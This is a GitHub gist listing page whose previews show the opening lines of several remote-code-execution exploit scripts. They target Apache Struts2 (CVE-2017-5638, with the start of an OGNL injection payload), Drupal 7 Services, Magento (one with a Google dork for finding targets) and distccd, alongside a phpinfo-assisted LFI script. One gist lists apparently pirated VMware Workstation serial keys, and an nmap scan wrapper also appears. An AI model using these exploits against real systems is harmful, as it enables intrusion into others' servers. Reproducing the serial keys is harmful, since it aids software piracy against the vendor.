Mah1ndra
/ phpinfolfi.py
Created
August 3, 2020 07:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf | |
| from __future__ import print_function | |
| from builtins import range | |
| import sys | |
| import threading | |
| import socket | |
| def setup(host, port): | |
| TAG="Security Test" |
Mah1ndra
/ Struts2-S2-045-rce.py
Created
July 31, 2020 16:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Reference: https://medium.com/@lucideus/exploiting-apache-struts2-cve-2017-5638-lucideus-research-83adb9490ede | |
| # CVE: 2017-5638 - Apache Struts2 S2-045 | |
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| import urllib2 | |
| import httplib | |
| def exploit(url, cmd): | |
| payload = "%{(#_='multipart/form-data')." | |
| payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." |
Mah1ndra
/ vmware-patch.sh
Created
July 25, 2020 06:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| VMWARE_VERSION=workstation-15.5.6 | |
| TMP_FOLDER=/tmp/patch-vmware | |
| rm -fdr $TMP_FOLDER | |
| mkdir -p $TMP_FOLDER | |
| cd $TMP_FOLDER | |
| git clone https://github.com/mkubecek/vmware-host-modules.git | |
| cd $TMP_FOLDER/vmware-host-modules | |
| git checkout $VMWARE_VERSION | |
| git fetch |
Mah1ndra
/ druap7x-Module-Service-RCE.php
Created
July 21, 2020 07:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Drupal 7.x Module Services - Remote Code Execution | |
| # Exploit Title: Drupal 7.x Services Module Remote Code Execution | |
| # Vendor Homepage: https://www.drupal.org/project/services | |
| # Exploit Author: Charles FOL | |
| # Contact: https://twitter.com/ambionics | |
| # Website: https://www.ambionics.io/blog/drupal-services-module-rce | |
| #!/usr/bin/php | |
| <?php |
Mah1ndra
/ Magento-Auth-RCE.py
Created
July 15, 2020 00:37
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution : php/webapps/37811.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE | |
| # Google Dork: "Powered by Magento" | |
| # Date: 08/18/2015 | |
| # Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com | |
| # Vendor Homepage: http://magento.com/ | |
| # Software Link: https://www.magentocommerce.com/download | |
| # Version: 1.9.0.1 and below | |
| # Tested on: Ubuntu 15 | |
| # CVE : none |
Mah1ndra
/ Magento-shoplift-rce.py
Last active
July 15, 2020 00:39
Magento eCommerce - Remote Code Execution : xml/webapps/37977.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################################################## | |
| #Exploit Title : Magento Shoplift exploit (SUPEE-5344) | |
| #Author : Manish Kishan Tanwar AKA error1046 | |
| #Date : 25/08/2015 | |
| #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi | |
| #Debugged At : Indishell Lab(originally developed by joren) | |
| ################################################################################################## | |
| """ | |
| //////////////////////// | |
| /// Overview: |
Mah1ndra
/ distccd_rce_CVE-2004-2687.py
Created
July 6, 2020 16:27
— forked from DarkCoderSc/distccd_rce_CVE-2004-2687.py
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| ''' | |
| distccd v1 RCE (CVE-2004-2687) | |
| This exploit is ported from a public Metasploit exploit code : | |
| https://www.exploit-db.com/exploits/9915 |
Mah1ndra
/ VMware Workstation 15.x.x serial key
Created
April 12, 2020 04:09
— forked from gopalindians/VMware Workstation 15.x.x serial key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Serial Keys: | |
| FU512-2DG1H-M85QZ-U7Z5T-PY8ZD | |
| CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD | |
| GV7N2-DQZ00-4897Y-27ZNX-NV0TD | |
| YZ718-4REEQ-08DHQ-JNYQC-ZQRD0 | |
| GZ3N0-6CX0L-H80UP-FPM59-NKAD4 | |
| YY31H-6EYEJ-480VZ-VXXZC-QF2E0 | |
| ZG51K-25FE1-H81ZP-95XGT-WV2C0 | |
| VG30H-2AX11-H88FQ-CQXGZ-M6AY4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ip=$1; | |
| echo "scaning: $ip"; | |
| ports=$(nmap -T4 --min-rate=1000 -p- $ip| grep ^[0-9]|cut -d '/' -f 1| tr '\n' ',' | sed s/,$//); | |
| echo "open ports: $ports" |
Mah1ndra
/ Crawler.py
Last active
April 9, 2019 16:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Code takes urls from cmd line. | |
| ex: ./crawler.py https://packages.debian.org/jessie/armel/patch/download | |
| The Crawler downalods all the debian patch files from the give link and stores in the specified outpath | |
| References: | |
| https://stackoverflow.com/questions/12996274/get-file-size-from-content-length-value-from-a-file-in-python-3-2 | |
| https://stackoverflow.com/questions/29827479/beautifulsoup-download-all-zip-files-from-google-patent-search | |
| """ | |
| from bs4 import BeautifulSoup |
NewerOlder